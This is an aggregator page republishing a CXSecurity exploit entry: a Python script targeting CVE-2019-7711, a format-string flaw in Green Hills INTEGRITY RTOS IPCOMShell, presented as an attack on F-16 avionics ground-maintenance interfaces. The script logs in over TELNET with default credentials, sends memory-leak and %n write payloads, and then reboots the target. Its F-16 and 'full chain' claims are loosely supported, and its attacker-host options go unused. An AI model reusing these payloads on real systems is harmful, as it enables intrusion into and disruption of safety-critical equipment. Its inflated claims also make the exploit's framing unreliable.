惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 【当耐特】
K
Kaspersky official blog
V
Vulnerabilities – Threatpost
Hacker News - Newest:
Hacker News - Newest: "LLM"
Security Archives - TechRepublic
Security Archives - TechRepublic
S
Secure Thoughts
I
Intezer
TaoSecurity Blog
TaoSecurity Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
Spread Privacy
Spread Privacy
A
About on SuperTechFans
NISL@THU
NISL@THU
The GitHub Blog
The GitHub Blog
Hugging Face - Blog
Hugging Face - Blog
S
Security @ Cisco Blogs
S
SegmentFault 最新的问题
G
Google Developers Blog
B
Blog
N
News and Events Feed by Topic
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Google DeepMind News
Google DeepMind News
V2EX - 技术
V2EX - 技术
V
Visual Studio Blog
MyScale Blog
MyScale Blog
Webroot Blog
Webroot Blog
Vercel News
Vercel News
IT之家
IT之家
Microsoft Security Blog
Microsoft Security Blog
Last Week in AI
Last Week in AI
Y
Y Combinator Blog
S
Security Affairs
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Stack Overflow Blog
Stack Overflow Blog
P
Proofpoint News Feed
L
Lohrmann on Cybersecurity
博客园 - 叶小钗
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Know Your Adversary
Know Your Adversary
T
Tailwind CSS Blog
F
Fortinet All Blogs
D
DataBreaches.Net
博客园 - Franky
博客园_首页
H
Heimdal Security Blog
宝玉的分享
宝玉的分享
阮一峰的网络日志
阮一峰的网络日志
Attack and Defense Labs
Attack and Defense Labs
Project Zero
Project Zero
雷峰网
雷峰网

The Exploit Database - CXSecurity.com

Joomla Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Microsoft Edge <= 150.0.4078.48 (Chromium-based) Type Confusion RCE PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario)
Mohammed Idr · 2026-05-05 · via The Exploit Database - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Full Chain - Realistic F-16 Ground Maintenance # CVE: CVE-2019-7711 # Date: 2026-05-04 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.ghs.com # Software Link: N/A (Proprietary) # Affected: Green Hills INTEGRITY RTOS 5.0.4 with Interpeak IPCOMShell - Used in F-16 Block 60 Color Display Processor (CDP) and mission systems # Tested on: INTEGRITY RTOS 5.0.4 lab simulation (emulating avionics ground test environment) # Category: Remote (Ground Maintenance) # Platform: Embedded RTOS - Aerospace (F-16 Avionics) # Exploit Type: Format String (Leak → Arbitrary Write → Potential Control Flow Hijack) # CVSS: 6.8 (Medium-High in ground maintenance context) # CWE : CWE-134 (Use of Externally-Controlled Format String) # Description: The undocumented "prompt" command in IPCOMShell passes user-controlled input directly to printf(). Enables full format string chain: memory leak to defeat ASLR, %n write primitive to overwrite function pointers/task handlers, then trigger for potential RCE in F-16 avionics during ground maintenance. # Fixed in: Newer INTEGRITY-178 builds with networking disabled in safety-critical partitions # Usage: # python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py 192.168.1.100 # # Options: # --lhost Attacker IP # --lport Attacker port # # Notes: # - Realistic ground maintenance scenario only. # - Requires manual offset analysis after leak. # - Educational purpose only. # # How to Use # # Step 1: Run against vulnerable maintenance TELNET interface. print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2019-7711 ║ ║ Target : F-16 INTEGRITY RTOS (Ground Maintenance) ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import telnetlib import time import argparse parser = argparse.ArgumentParser(description="CVE-2019-7711 F-16 Ground Maintenance Exploit") parser.add_argument("target", help="Target IP (F-16 Ground Support Equipment)") parser.add_argument("--lhost", default="0.0.0.0", help="Attacker IP") parser.add_argument("--lport", type=int, default=4444, help="Attacker port") args = parser.parse_args() HOST = args.target PORT = 23 print("[*] Realistic Scenario: Attacking F-16 during ground maintenance via test interface") print("[!] Warning: TELNET usually disabled in real aircraft. Maintenance mode assumed.") try: tn = telnetlib.Telnet(HOST, PORT, timeout=20) print("[+] Connected to IPCOMShell on F-16 maintenance interface") time.sleep(1.5) tn.read_until(b"login:", timeout=8) tn.write(b"admin\r\n") time.sleep(1) tn.write(b"password\r\n") time.sleep(2) print("\n[+] Phase 1 → Strong Memory Leak") LEAK_PAYLOAD = "%p." * 50 + "%x." * 40 + "%s." * 20 + "%$p" tn.write(f"prompt {LEAK_PAYLOAD}\r\n".encode()) tn.write(b"pwd\r\n") tn.write(b"show tasks\r\n") tn.write(b"help\r\n") time.sleep(6) leak = tn.read_very_eager().decode(errors='ignore') print("\n" + "="*90) print("RAW LEAK OUTPUT - ANALYZE MANUALLY") print("="*90) print(leak[:4500]) print("="*90) print("\n[+] Phase 2 → Arbitrary Memory Write (%n)") WRITE_PAYLOAD = "%2500c%35$n" tn.write(f"prompt {WRITE_PAYLOAD}\r\n".encode()) tn.write(b"pwd\r\n") time.sleep(4) print("\n[+] Phase 3 → Trigger Control Flow Hijack") tn.write(b"exit\r\n") tn.write(b"reboot\r\n") time.sleep(3) print("[+] Exploit chain completed.") tn.close() except Exception as e: print(f"[-] Error: {e}")

References:

Green Hills Software INTEGRITY RTOS documentation (F-16 usage)




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.